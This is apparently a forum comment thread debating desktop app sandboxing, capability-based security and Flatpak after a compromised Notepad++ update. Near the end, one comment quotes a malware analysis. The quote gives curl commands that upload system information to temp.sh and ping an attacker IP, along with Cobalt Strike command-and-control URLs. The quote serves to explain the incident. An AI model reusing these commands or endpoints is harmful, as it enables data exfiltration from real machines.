MacOS has been getting a lot of flak recently for (correct) UI reasons, but I honestly feel like they're the closest to the money with granular app permissions.
Linux people are very resistant to this, but the future is going to be sandboxed iOS style apps. Not because OS vendors want to control what apps do, but because users do. If the FOSS community continues to ignore proper security sandboxing and distribution of end user applications, then it will just end up entirely centralised in one of the big tech companies, as it already is on iOS and macOS by Apple.
I knock on your door.
You invite me to sit with you in your living room.
I can't easily sneak into your bed room. Further, your temporary access ends as soon as you exit my house.
The same should happen with apps.
When I run 'notepad dir1/file1.txt', the package should not sneakily be able to access dir2. Further, as soon as I exit the process, the permission to access dir1 should end as well.
A better example would be requiring the mailman to obtain written permission to step on your property every day. Convenience trumps maximal security for most people.
> When I run 'notepad dir1/file1.txt', the package should not sneakily be able to access dir2.
What happens if the user presses ^O, expecting a file open dialog that could navigate to other directories? Would the dialog be somehow integrated to the OS and run with higher permissions, and then notepad is given permissions to the other directory that the user selects?
Pretty sure that’s how it works on iOS. The app can only access its own sandboxed directory. If it wants anything else, it has to use a system provided file picker that provides a security scoped url for the selected file.
Because security people often does not know the balance between security and usability, and we end up with software that is crippled and annoying to use.
I think we could get a lot further if we implement proper capability based security. Meaning that the authority to perform actions follows the objects around. I think that is how we get powerful tools and freedom, but still address the security issues and actually achieve the principle of least privilege.
For FreeBSD there is capsicum, but it seems a bit inflexible to me. Would love to see more experiments on Linux and the BSDs for this.
FreeBSD used to have an ELF target called "CloudABI" which used Capsicum by default.
Parameters to a CloudABI program were passed in a YAML file to a launcher that acquired what was in practice the program's "entitlements"/"app permissions" as capabilities that it passed to the program when it started.
I had been thinking of a way to avoid the CloudABI launcher.
The entitlements would instead be in the binary object file, and only reference command-line parameters and system paths.
I have also thought of an elaborate scheme with local code signing to verify that only user/admin-approved entitlements get lifted to capabilities.
However, CloudABI got discontinued in favour of WebAssembly (and I got side-tracked...)
A capability model wouldn't have prevented the compromised binary from being installed, but it would totally prevent that compromised binary from being able to read or write to any specific file (or any other system resource) that Notepad++ wouldn't have ordinarily had access to.
The original model of computer security is "anything running on the machine can do and touch anything it wants to".
A slightly more advanced model, which is the default for OSes today, is to have a notion of a "user", and then you grant certain permissions to a user. For example, for something like Unix, you have the read/write/execute permissions on files that differ for each user. The security mentioned above just involves defining more such permissions than were historically provided by Unix.
But the holy grail of security models is called "capability-based security", which is above and beyond what any current popular OS provides. Rather than the current model which just involves talking about what a process can do (the verbs of the system), a capability involves taking about what a process can do an operation on (the nouns of the system). A "capability" is an unforgeable cryptographic token, managed by the OS itself (sort of like how a typical OS tracks file handles), which grants access to a certain object.
Crucially, this then allows processes to delegate tasks to other processes in a secure way. Because tokens are cryptographically unforgeable, the only way that a process could have possibly gotten the permission to operate on a resource is if it were delegated that permission by some other process. And when delegating, processes can further lock down a capability, e.g. by turning it from read/write to read-only, or they can e.g. completely give up a capability and pass ownership to the other process, etc.
Yet we look at phones, and we see people accepting outrageous permissions for many apps: They might rely on snooping into you for ads, or anything else, and yet the apps sell, and have no problem staying in stores.
So when it's all said and done, I do not expect practical levels of actual isolation to be that great.
> Yet we look at phones, and we see people accepting outrageous permissions for many apps
The data doesn't support the suggestion that this is happening on any mass scale. When Apple made app tracking opt-in rather than opt-out in iOS 14 ("App Tracking Transparency"), 80-90% of users refused to give consent.
It does happen more when users are tricked (dare I say unlawfully defrauded?) into accepting, such as when installing Windows, when launching Edge for the first time, etc. This is why externally-imposed sandboxing is a superior model to Zuck's pinky promises.
In the case of iOS, the choice was to use the app with those permissions or without them, so of course people prefer to not opt-in - why would they?
But when the choice is between using the app with such spyware in it, or not using it at all, people do accept the outrageous permissions the spyware needs.
For all its other problems, App Store review prevents a lot of this: you have to explain why your app needs entitlements A, B and C, and they will reject your update if they don't think your explanation is good enough. It's not a perfect system, but iOS applications don't actually do all that much snooping.
It's truly perverse that, at the same time that desktop systems are trying to lock down what trusted, conventional native apps can and cannot do and/or access, you have the Chrome team pushing out proposals to expand what browsers allow websites to do to the user's file system, like silently/arbitrarily reading and writing to the user's disk—gated only behind a "Are you sure you want to allow this? Y/N"-style dialog that, for extremely good reasons, anyone with any sense about design and interaction has strongly opposed for the last 20+ years.
I assumed the primary feature of Flatpak was to make a “universal” package across all Linux platforms. The security side of things seems to be a secondary consideration. I assume that the security aspect is now a much higher priority.
Many apps require unnecessarily broad permissions with Flatpak. Unlike Android and iOS apps they weren't designed for environments with limited permissions.
The XDG portal standards being developed to provide permissions to apps (and allow users to manage them), including those installed via Flatpak, will continue to be useful if and when the sandboxing security of Flatpaks are improved. (In fact, having the frontend management part in place is kind of a prerequisite to really enforcing a lot of restrictions on apps, lest they just stop working suddenly.)
I intensely hate that a stupid application can modify .bashrc and permanently persist itself.
Sure, in theory, SELinux could prevent this. But seems like an uphill battle if my policies conflict with the distro’s. I’d also have to “absorb” their policies’ mental model first…
I tend to think things like .bashrc or .zshrc are bad ideas anyways. Not that you asked but I think the simpler solution is to have those files be owned by root and not writable by the user. You're probably not modifying them that often anyways.
> Linux people are very resistant to this, but the future is going to be sandboxed iOS style apps.
Linux people are NOT resistant to this. Atomic desktops are picking up momentum and people are screaming for it. Snaps, flatpaks, appimages, etc. are all moving in that direction.
As for plain development, sadly, the OS developers are simply ignoring the people asking. See:
I'm sure that will contribute to the illusion of security, but in reality the system is thoroughly backdoored on every level from the CPU on up, and everyone knows it.
There is no such thing as computer security, in general, at this point in history.
There's a subtlety that's missing here: if your threat model doesn't include the actors who can access those backdoors, then computer security isn't so bad these days.
That subtlety is important because it explains how the backdoors have snuck in — most people feel safe because they are not targeted, so there's no hue and cry.
The backdoors snuck in because literally everyone is being targeted.
Few people ever see the impact of that themselves or understand the chain of events that brought those impacts about.
And yet, many people perceive a difference between “getting hacked” and “not getting hacked” and believe that certain precautions materially affect whether or not they end up having to deal with a hacking event.
Are they wrong? Do gradations of vulnerability exist? Is there only one threat model, “you’re already screwed and nothing matters”?
I'm sure you're right; however, there is still a distinction between the state using my device against me and unaffiliated or foreign states using my device against me or more likely simply to generate cash for themselves.
I almost feel like this should just be the default action for all applications. I don't need them to escape out of a defined root. It's almost like your documents and application are effectively locked together. You have to give permissions for an app to extra data from outside of the sandbox.
Linux has this capability, of course. And it seems like MacOS prompts me a lot for "such and such application wants to access this or that". But I think it could be a lot more fine-grained, personally.
I've been arguing for this for years. There's no reason every random binary should have unfettered, invisible access to everything on my computer as if it were me.
iOS and Android both implement these security policies correctly. Why can't desktop operating systems?
The short answer is tech debt. The major mobile OSes got to build a new third party software platform from day 0 in the late 2000s, one which focused on and enforced priorities around power consumption and application sandboxing from the getgo etc.
The most popular desktop OSes have decades of pre-existing software and APIs to support and, like a lot of old software, the debt of choices made a long time ago that are now hard/expensive to put right.
The major desktop OSes are to some degree moving in this direction now (note the ever increasing presence of security prompts when opening "things" on macOS etc etc), but absent a clean sheet approach abandoning all previous third party software like the mobile OSes got, this arguably can't happen easily over night.
Mobile platforms are entirely useless to me for exactly this reason, individual islands that don't interact to make anything more generally useful. I would never use any os that worked like that, it's for toys and disposable software only imo.
Mobile platforms are far more secure than desktop computing software. I'd rather do internet banking on my phone than on my computer. You should too.
We can make operating systems where the islands can interact. Its just needs to be opt in instead of opt out. A bad Notepad++ update shouldn't be able to invisibly read all of thunderbird's stored emails, or add backdoors to projects I'm working on or cryptolocker my documents. At least not without my say so.
I get that permission prompts are annoying. There are some ways to do the UI aspect in a better way - like have the open file dialogue box automatically pass along permissions to the opened file. But these are the minority of cases. Most programs only need to access to their own stuff. Having an OS confirmation for the few applications that need to escape their island would be a much better default. Still allow all the software we use today, but block a great many of these attacks.
Both are true, and both should be allowed to exist as they serve different purposes.
Sound engineers don't use lossy formats such as MP3 when making edits in preproduction work, as its intended for end users and would degrade quality cumulatively. In the same way someone working on software shouldn't be required to use an end-user consumption system when they are at work.
It would be unfortunate to see the nuance missed just because a system isn't 'new', it doesn't mean the system needs to be scrapped.
> In the same way someone working on software shouldn't be required to use an end-user consumption system when they are at work.
I'm worried that many software developers (including me, a lot of the time) will only enable security after exhausting all other options. So long as there's a big button labeled "Developer Mode" or "Run as Admin" which turns off all the best security features, I bet lots of software will require that to be enabled in order to work.
Apple has quite impressive frameworks for application sandboxing. Do any apps use them? Do those DAWs that sound engineers use run VST plugins in a sandbox? Or do they just dyld + call? I bet most of the time its the latter. And look at this Notepad++ attack. The attack would have been stopped dead if the update process validated digital signatures. But no, it was too hard so instead they got their users' computers hacked.
I'm a pragmatist. I want a useful, secure computing environment. Show me how to do that without annoying developers and I'm all in. But I worry that the only way a proper capability model would be used would be by going all in.
There is a middle ground (maybe even closer to more limited OS design principles) exist. It is not just toys. Otherwise neither UWP on Windows nor Flatpaks or Firejail would exist nor systemd would implement containerization features.
In such a scenario, you can launch your IDE from your application manager and then only give write access to specific folders for a project. The IDE's configuration files can also be stored in isolated directories. You can still access them with your file manager software or your terminal app which are "special" and need to be approved by you once (or for each update) as special. You may think "How do I even share my secrets like Git SSH keys?". Well that's why we need services like the SSH Agent or Freedesktop secret-storage-spec. Windows already has this btw as the secret vaults. They are there since at least Windows 7 maybe even Vista.
If a sandbox is optional then it is not really a good sandbox
naturally even flatpak on Linux suffers from this as legacy software simply doesn’t have a concept of permission models and this cannot be bolted on after the fact
The containers are literally the "bolting on". You need to give the illusion of the software is running under a full OS but you can actually mount the system directories as read-only.
and you still need to mount volumes and add all sorts of holes in the sandbox for applications to work correctly and/or be useful
try to run gimp inside a container for example, you’ll have to give access to your ~/Pictures or whatever for it to be useful
Compared to some photo editing applications on android/iOS which can work without having filesystem access by getting the file through the OS file picker
running apps in a sandbox is ok, but remember to disable internet access. A text editor should not require it, and can be used to exfiltrate the text(s) you're editing.
When started, it sends a heartbeat containing system information to the attackers. This is done through the following steps:
3 Then it uploads the 1.txt file to the temp[.]sh hosting service by executing the curl.exe -F "file=@1.txt" -s https://temp.sh/upload command;
4 Next, it sends the URL to the uploaded 1.txt file by using the curl.exe --user-agent "https://temp.sh/ZMRKV/1.txt" -s http://45.76.155[.]202
--
The Cobalt Strike Beacon payload is designed to communicate with the cdncheck.it[.]com C2 server. For instance, it uses the GET request URL https://45.77.31[.]210/api/update/v1 and the POST request URL https://45.77.31[.]210/api/FileUpload/submit.
--
The second shellcode, which is stored in the middle of the file, is the one that is launched when ProShow.exe is started. It decrypts a Metasploit downloader payload that retrieves a Cobalt Strike Beacon shellcode from the URL https://45.77.31[.]210/users/admin
Not what the OP is referring to, but UWP and successor apps were always sandboxed, from the time of Windows 8 onwards. This was derived from the Windows Mobile model, which in turn was emulating the Android/iOS app model.
There is no reason for a tool to implicitly access my mounted cloud drive directory and browser cookies data.